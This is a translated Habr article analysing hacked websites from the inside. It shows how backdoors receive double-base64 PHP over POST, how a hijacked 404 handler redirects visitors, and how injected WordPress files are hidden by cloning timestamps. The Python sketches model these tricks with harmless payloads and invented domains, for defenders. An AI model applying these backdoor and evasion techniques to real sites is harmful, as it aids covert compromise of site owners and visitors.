
An inside look at a hacked site

It is no secret that most sites these days are not hacked by hand. A large army of bots searches for vulnerabilities in site scripts, brute-forces CMS admin panels and FTP/SSH accounts, then uploads small loader scripts or backdoors, injects several dozen "agents" into the site's scripts, and scatters web shells, spam mailers, and other malicious PHP (and sometimes Perl) scripts across any directories open for writing. From the inside, an infected site looks like this (a fragment of a report from the AI-BOLIT scanner):



The pattern of infection (the number, composition, and purpose of the malicious scripts) varies. In this case, the infection statistics were as follows:

Among the "malware" there are all sorts of interesting specimens, but today is not about them. It is more interesting to analyze not the static malicious code in files but the way the "malware" operates dynamically: what requests the command-and-control centers send to the embedded backdoors, in what format, with what intensity, with what parameters, and so on. Besides, static analysis works poorly against modern malware, because some scripts contain no payload at all.

Take a popular backdoor:



It consists of one or two lines and is used to receive and execute PHP code. The payload "arrives" in the POST request parameters and is executed on the spot. Naturally, the payload code is not stored anywhere, so dynamic analysis usually runs into a lack of data: there are no logs containing the request bodies with the code under study.
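The exchange with such a backdoor can be sketched in Python. This assumes a backdoor of the common eval(base64_decode($_POST[...])) form; the parameter name and the payload below are invented for illustration, not taken from the article:

```python
import base64
from urllib.parse import urlencode, parse_qs

# Hypothetical PHP code the command center wants executed on the
# compromised site (a harmless stand-in, not a real payload).
php_payload = 'echo md5("test");'

# The controller base64-encodes the code and ships it as an ordinary
# POST parameter; "a" is an assumed parameter name.
body = urlencode({"a": base64.b64encode(php_payload.encode()).decode()})

# On the server, a one-liner like eval(base64_decode($_POST["a"]))
# reverses the transformation and executes the result immediately,
# leaving nothing on disk.
recovered = base64.b64decode(parse_qs(body)["a"][0]).decode()
```

Because the code exists only inside the request body, only request-body logging can recover it.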

To analyze the communication between a command-and-control center and its "agents", you need to log HTTP requests to the malicious script, which means setting up logging of POST request bodies to a file ahead of time; this is never done on shared hosting, and even on dedicated servers POST bodies are not logged, both to save server resources and because there is usually no need. But that is not all. The second problem with analyzing a hack and infection is that the owner of the infected site turns to specialists too late.
Almost always, "patients" arrive for treatment two or three weeks after the first malicious script appeared, that is, when the uploaded code has already been planted, has "lain low" for a while, and is being actively exploited by the hackers, and the site has been blocked by the hoster for sending spam, hosting phishing pages, or attacking third-party resources. (The code lies low, by the way, precisely to cover the traces of the hack and avoid immediately arousing the site owner's suspicion.) After a couple of weeks, log rotation does its dirty work, erasing the record of how the malicious code was uploaded, and the planted malware starts producing its harmful payload: attacking other resources, uploading doorway pages and spam mailers to the site, injecting redirects to exploit-kit bundles, sending tons of phishing spam, and so on.
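As a rough illustration of what the missing POST-body logging involves, here is a minimal WSGI middleware sketch in Python. In practice this would more likely be a web-server module or a PHP-level hook; the function names, file name, and log format below are all invented:

```python
import datetime
import io

def post_logger(app, log_path="post_bodies.log"):
    """WSGI middleware sketch: append every POST body to a file,
    timestamped, so requests to backdoors can be studied later."""
    def wrapper(environ, start_response):
        if environ.get("REQUEST_METHOD") == "POST":
            length = int(environ.get("CONTENT_LENGTH") or 0)
            body = environ["wsgi.input"].read(length)
            # Re-wrap the body so the wrapped app can still read it.
            environ["wsgi.input"] = io.BytesIO(body)
            stamp = datetime.datetime.now(datetime.timezone.utc).isoformat()
            with open(log_path, "ab") as log:
                log.write(b"%s %s %s\n" % (
                    stamp.encode(),
                    environ.get("PATH_INFO", "").encode(),
                    body,
                ))
        return app(environ, start_response)
    return wrapper
```

Even a crude logger like this, installed early, preserves exactly the data that log rotation and in-memory-only payloads otherwise destroy.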

But from time to time it is still possible to set up logging on an infected site and capture the requests to the malicious scripts. So, what is hidden from prying eyes?

A typical infection of this kind plants a redirect in the root .htaccess that sends visitors to a pharma affiliate program (selling Viagra and the like), a wap-click affiliate program (subscribing users to paid mobile content via SMS), or a malicious resource (for drive-by attacks, or trojan downloads disguised as a Flash Player or antivirus update).



The redirect here is implemented as follows: PHP code wrapped in base64 is transmitted in a POST request, executed via a backdoor on the hacked site, and registers its own 404 error handler that throws visitors to the attacker's site. A single missing image, script, or .css file on any page of the site is enough to trigger the redirect. The domains to which visitors are redirected change periodically.
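The effect of the hijacked handler can be modeled in a few lines of Python; the domain and function name are invented, and the real handler is PHP code planted on the hacked site:

```python
# Invented attacker domain; the real ones rotate periodically.
ATTACKER = "http://pharma-example.invalid/"

def hijacked_404(path):
    """Instead of a normal Not Found page, the planted handler answers
    any missing resource with a redirect to the attacker's site."""
    return "302 Found", {"Location": ATTACKER + path.lstrip("/")}

# Any missing image, script, or .css reference on a page triggers it:
status, headers = hijacked_404("/img/logo.png")
```

This is why a single broken resource reference anywhere on the site is enough to expose visitors to the redirect.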

Another example: the log of requests to embedded backdoors and uploaded spam-mailing scripts:



Here, too, all data is transmitted base64-encoded via POST and COOKIE variables. Moreover, the executable fragments are wrapped in base64 twice, in order to bypass WAFs and web scanners that know about base64 and can decode it. Decoded, a request to the backdoor looks like this:





The payload crawls directories and injects code that looks for WordPress files in accessible directories and does one of two things: either inserts malicious content into them or restores their original contents (the command center plants the malware temporarily or on a schedule). To make the modified scripts harder to find, their modification date (mtime) is set to the date of one of the legitimate WordPress scripts. In addition, the read-only attribute is set so that inexperienced webmasters cannot edit the files (which genuinely puzzles many of them).
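The timestamp trick is easy to demonstrate. A Python sketch, with invented file names in a temporary directory: after modifying a file, the mtime of an untouched WordPress script is cloned onto it, and the file is made read-only:

```python
import os
import stat
import tempfile

# Illustrative paths only; the real targets are WordPress site files.
workdir = tempfile.mkdtemp()
reference = os.path.join(workdir, "wp-settings.php")  # legitimate file
target = os.path.join(workdir, "wp-load.php")         # file being modified

open(reference, "w").close()
os.utime(reference, (1_400_000_000, 1_400_000_000))   # an old timestamp

with open(target, "w") as f:
    f.write("<?php /* injected content would go here */ ?>")

ref = os.stat(reference)
os.utime(target, (ref.st_atime, ref.st_mtime))        # clone the mtime
os.chmod(target, stat.S_IREAD)                        # read-only attribute
```

After this, a directory listing sorted by date shows nothing unusual, and a naive attempt to edit the file in an FTP client fails, which matches the confusion the article describes.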

As for the other "payload", spam mailing: the content is wrapped in base64 twice and passed in the POST parameters of a request to the spam mailer. From time to time the operators also send test messages with service information:



An interesting observation: if you remove all malicious scripts from the site, then after a few unsuccessful requests the communication with the "agents" stops. That is, the command center does not try to immediately re-hack the site and upload new backdoors, apparently for the same reason: to keep the initial infection process hidden. But if even one backdoor is left behind during cleanup, a whole "bundle" of hacker shells, backdoors, and spam mailers will be downloaded through it all over again.
That is why a site must always be cleaned very thoroughly.

Source: https://habr.com/ru/post/280516/

